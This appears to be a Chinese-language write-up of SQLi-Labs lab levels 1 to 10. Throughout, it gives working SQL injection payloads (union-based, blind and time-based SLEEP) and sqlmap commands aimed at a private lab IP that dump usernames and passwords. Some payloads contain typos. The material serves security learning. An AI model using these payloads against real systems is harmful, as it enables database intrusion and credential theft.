SQL注入|SQL注入 - SQLi-Labs靶场过关记录
Less-1
1、看报错类型,确定注入点
?id=1' order by 4--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/db2f37a57b1b48cf8231a1dade7664d8.jpg)
文章图片
2、确定数据库
?id=-1' union select 1,2,3--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/82f3a8ede87544d5ad1cac42c4297dff.jpg)
文章图片
3、查看数据库
?id=-1' union select 1,2,database(); --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/b516a84bd02b454c9dbafc6dbd0a3ec9.jpg)
文章图片
4、查看数据库中的表
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/d6b477d8ae2d4dbd9cfc088d4a1bcc4f.jpg)
文章图片
5、提取security数据库中的users表的信息
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/029c4f11b697430ca4cafe5ac9e9dd72.jpg)
文章图片
6、提取users表中的用户名和密码,注入完成
?id=1' union select 1,2,group_concat(username,"+",password) from security.users--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/93d5b35c620e407e8a14495c7531df28.jpg)
文章图片
Less - 2 1、直接测试报错
?id=1 order by 4--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/c3ed1f07d4234f61af06d5848f363c14.jpg)
文章图片
2、查询当前数据库名
?id=-1 union select 1,2,database(); --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/b77edd444e854631963e8f1fded1791b.jpg)
文章图片
3、查看当前数据库所有表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database(); --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/c89189ffbc404a968224e91c83632c13.jpg)
文章图片
4、查看users表的结构信息
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/47d78e7176bb4dd89498bf63f21a698d.jpg)
文章图片
【SQL注入|SQL注入 - SQLi-Labs靶场过关记录】5、查询users表中的用户名和密码
?id=-1 union select 1,group_concat(username,"+",password),3 from security.users--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/3b9f3d4e78824f6f99ce7bce7cd6488f.jpg)
文章图片
Less - 3 1、测试报错,查看注入点
?id=1") order by 4--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/8aee9abb9c7d4a37801b6f1f9e236238.jpg)
文章图片
2、查看当前用户、数据库版本、当前数据库
?id=1') union select 1,2,group_concat(user(),"+",version(),"+",database()); --++
3、查看security库中的表
?id=1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/172df0d2af394e2d9dbe9905746c69dd.jpg)
文章图片
4、查看users表的结构
?id=1') union select 1,2,group_concat(columns_name) from information_schema.columns where table_name='users'; --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/cba251458d81437299d29141fd52518a.jpg)
文章图片
5、查看users表中的username和password,完成注入
?id=1') union select 1,2,group_concat(username,"+",password) from security.users; --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/68200311ec564a408ef36dd75c6e83a1.jpg)
文章图片
Less - 4 1、测试报错,查找注入点
?id=1") order by 4--++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/f1ee51249a3d4e84b1271978ae24d452.jpg)
文章图片
2、查看当前用户、数据库版本、当前数据库
?id=-1") union select 1,2,group_concat(user(),"+",version(),"+",database()); --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/ef8c4eff13644c51a8ee280d6d84360d.jpg)
文章图片
3、查看security库中的表
?id=-1") union group_concat(tables_name) from information_schema.tables where table_schema='security'; --++
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/760fe677f12d41b69608275a74c28a75.jpg)
文章图片
4、查看users表的结构,语句与上一关差不多
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/7c42c45f9bae4aff86075b5dc1eb385f.jpg)
文章图片
5、查看users表中的username和password,完成注入
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/a107901b27734da49436ab007dd9dc68.jpg)
文章图片
Less - 5 1、测试报错
?id=1' order by 3--+
不报错,但无回显
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/bfdd4f6d717746ce84f007202db12c2d.jpg)
文章图片
?id=1' order by 4--+
报错,确定存在注入点
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/6e89d0503ed54117a27f39d099f5ae1c.jpg)
文章图片
?id=1' union select 1,2,3--+
无数据回显,可能需要盲注
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/f289beab7311499a9c0841e2db402c29.jpg)
文章图片
2、用sqlmap跑一下,测试报错注入
sqlmap -u "http://192.168.40.128:86/Less-5/?id=1'"
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/18d043678f8d473aa2d59683651301f5.png)
文章图片
3、查询所有数据库
sqlmap -u "http://192.168.40.128:86/Less-5/?id=1'" --dbs -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/f9a0ab00fcdd42dd8ca84d9b6ce04860.png)
文章图片
4、查询当前数据库
sqlmap -u "http://192.168.40.128:86/Less-5/?id=1'" --current-db -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/9935400bb4aa4223beafc0e5e0747fc7.png)
文章图片
5、查询当前数据库下的表
sqlmap -u "http://192.168.40.128:86/Less-5/?id=1'" -D"security" --tables -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/bef79f3cd96f41ed93788372cd634a76.png)
文章图片
6、发现有一个名为users的表,查询users的所有字段名
sqlmap -u "http://192.168.40.128:86/Less-5/?id=1'" -D"security" -T"users" --columns -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/cb06c75377274d38a66424696bdb34a1.png)
文章图片
7、发现username和password字段,查询这两个字段
sqlmap -u "http://192.168.40.128:86/Less-5/?id=1'" -D"security" -T"users" -C"username,password" --dump -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/0dda357a41054e0d856cfecc2e1523ed.jpg)
文章图片
Less - 6 1、测试报错
http://192.168.40.128:86/Less-6/?id=1" order by 3--+
没有报错,但是也没有数据回显
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/67c7d8abc1bb4f649e62c0658c2238b4.jpg)
文章图片
http://192.168.40.128:86/Less-6/?id=1" order by 4--+
报错,确定存在注入点
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/5daac74c13f04722aa3d4cb59ba03dda.jpg)
文章图片
2、查询无回显,需要盲注
http://192.168.40.128:86/Less-6/?id=1" union select 1,2,3--+
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/8011cf2c5c12415db4ac1f2d68db1806.jpg)
文章图片
3、使用sqlmap测试注入点
sqlmap -u http://192.168.40.128:86/Less-6/?id=1" -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/7bffe242fb674d6d8c655b69d4b35537.png)
文章图片
4、使用sqlmap盲注查询所有数据库
sqlmap -u 'http://192.168.40.128:86/Less-6/?id=1"' --dbs
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/9030e4d68e57474cbb94120bb70d2667.jpg)
文章图片
5、sqlmap查询当前数据库
sqlmap -u 'http://192.168.40.128:86/Less-6/?id=1"' --current-db -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/ec44b28f6f1d4d0c925a85ad0c28b2dd.jpg)
文章图片
6、sqlmap查询当前数据库security下的所有表
sqlmap -u 'http://192.168.40.128:86/Less-6/?id=1"' -D"security" --tables -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/749ba485e51249e68997f53f15215e26.jpg)
文章图片
7、发现存在users表,查询该表中的所有字段
sqlmap -u 'http://192.168.40.128:86/Less-6/?id=1"' -D"security" -T"users" --columns -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/47f98a2e750444cda9ed05ba5ac92185.jpg)
文章图片
8、发现username和password字段,查询这两个字段的内容
sqlmap -u 'http://192.168.40.128:86/Less-6/?id=1"' -D"security" -T"users" -C"username,password" --dump -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/20cf5c0e739b4c6b9c23d3c77b2d175b.jpg)
文章图片
Less - 7 1、测试报错
http://192.168.40.128:86/Less-7/?id=1')) order by 4--+
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/02b2c6ab34904d93a8dceaad4bfa0c58.jpg)
文章图片
2、sqlmap测试报错注入点
sqlmap -u "http://192.168.40.128:86/Less-7/?id=1'))" -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/b492fe7fe3e04899b9ded81c2281b25a.jpg)
文章图片
3、sqlmap查询当前数据库
sqlmap -u "http://192.168.40.128:86/Less-7/?id=1'))" --current-db -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/29644f57abf246b499ce64f168fb9a2f.jpg)
文章图片
4、sqlmap查询当前数据库下的所有表
sqlmap -u "http://192.168.40.128:86/Less-7/?id=1'))" -D"security" --tables -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/0994421e5c84496982885f35fd0499e4.jpg)
文章图片
5、发现存在users表,查询该表下所有字段名
sqlmap -u "http://192.168.40.128:86/Less-7/?id=1'))" -D"security" -T"users" --columns -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/f167eeb4512443bda956f503db5a2c9a.jpg)
文章图片
6、发现字段username和password,查询内容
sqlmap -u "http://192.168.40.128:86/Less-7/?id=1'))" -D"security" -T"users" -C"username,password" --dump -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/c8fbc1eeb8954774b6baf06fa83ed44c.jpg)
文章图片
Less - 8 1、测试报错
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/91ef209a6edf4f1ca65591f0114015c3.jpg)
文章图片
2、直接sqlmap跑注入点
sqlmap -u 'http://192.168.40.128:86/Less-8/?id=1%22' -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/7589c170dbe1472e8a1e5f19679281b5.jpg)
文章图片
3、sqlmap查询当前用户
sqlmap -u 'http://192.168.40.128:86/Less-8/?id=1%22' --current-user -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/73c13c0bbc23434a85b374926865de7e.jpg)
文章图片
4、sqlmap查询所有数据库
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/0e7511200a414e3ba0127a7d3958c199.jpg)
文章图片
5、查询当前数据库
sqlmap -u 'http://192.168.40.128:86/Less-8/?id=1%22' --current-db -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/1ac2f20af20148d498ead25319a4a158.jpg)
文章图片
6、查询当前数据库下的所有表
sqlmap -u 'http://192.168.40.128:86/Less-8/?id=1%22' -D"security" --tables -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/6eae90e3a04c44b5a9b1afbbaadd7c58.jpg)
文章图片
7、发现users表,查询表中所有字段
sqlmap -u 'http://192.168.40.128:86/Less-8/?id=1%22' -D"security" -T"users" --columns -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/d6d2c9f875b64e96a3199f19d31fb1d1.jpg)
文章图片
Less - 9 1、测试单双引号和字符均无报错,直接sqlmap测试
sqlmap -u "http://192.168.40.128:86/Less-9/?id=1" -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/cec82f03a72e4ecd82cf34d443a5d2fe.jpg)
文章图片
2、查询所有数据库
sqlmap -u "http://192.168.40.128:86/Less-9/?id=1" --dbs -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/c8b85c6beff04eb68e050616a857c662.jpg)
文章图片
3、查询当前数据库与用户名
sqlmap -u "http://192.168.40.128:86/Less-9/?id=1" --current-db --current-user -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/7e170c7cad7d4e698edabb47091dd18e.jpg)
文章图片
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/a3eb696f7f4f4444a6bdd58f2819c883.jpg)
文章图片
4、查询当前数据库下的所有表
sqlmap -u "http://192.168.40.128:86/Less-9/?id=1" -D"security" --tables -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/8bbc83e1edd84c96b9dca00532d92396.jpg)
文章图片
5、发现users表,查询字段
sqlmap -u "http://192.168.40.128:86/Less-9/?id=1" -D"security" -T"users" --columns -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/be2ce230058b43ab91b4e8e5ca0efcbe.jpg)
文章图片
6、发现username和password字段,查询内容
sqlmap -u "http://192.168.40.128:86/Less-9/?id=1" -D"security" -T"users" -C"username,password" --dump -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/8b123d7d796b40338faf582b0e6016e0.jpg)
文章图片
Less - 10 1、使用sqlmap进行延时注入,level设置为3,可以测试双字符,线程设置为10
sqlmap -u "http://192.168.40.128:86/Less-10/?id=1" -p id --technique T -threads 10 -v 3 -level 3 --time-sec 9
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/24e10a3ea8954985a06fa4e10104716f.jpg)
文章图片
Payload: id=1" AND (SELECT 3880 FROM (SELECT(SLEEP(9)))aNIN) AND "Rweq"="Rweq
2、sqlmap测试当前数据库
sqlmap -u "http://192.168.40.128:86/Less-10/?id=1" -p id --technique T -threads 10 -v 3 -level 3 --time-sec 9 --current-db
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/7d034ccaaabb4287801cbf458d016f7a.jpg)
文章图片
当前数据库名:security
3、sqlmap测试当前数据库下的表名
sqlmap -u "http://192.168.40.128:86/Less-10/?id=1" -p id --technique T -threads 10 -level 3 --time-sec 9 -D"security" --tables -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/f2241c35e6d04c6388bf26b66ff4c2ba.jpg)
文章图片
当前数据库security下存在的表:emails、referes、uagents、users
4、直接爆数据
sqlmap -u "http://192.168.40.128:86/Less-10/?id=1" -p id --technique T -threads 10 -level 3 --time-sec 9 -D"security" -T"users" -C"username,password" --dump -v 3
![SQL注入|SQL注入 - SQLi-Labs靶场过关记录](https://img.it610.com/image/info8/a477a24f415c48b0992ebc6190f27dc8.jpg)
文章图片
推荐阅读
- mysql分组后合并显示一个字段的多条数据方式
- Docker中优化Mysql运行内存的操作
- docker实现MySQL数据同步的方法
- 2022年一季度文章分类汇总
- mysql|mysql 段错误 (core dumped)_段错误调试神器 - Core Dump详解
- SQL注入|SQL注入漏洞详解(一)
- mysql|mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
- 网络安全|利用SQL注入漏洞登录后台
- #|DVWA-sql注入漏洞详解
- mysql|mysql 注入 3.0_ThinkPHP 3.0~3.2 SQL注入漏洞详解与利用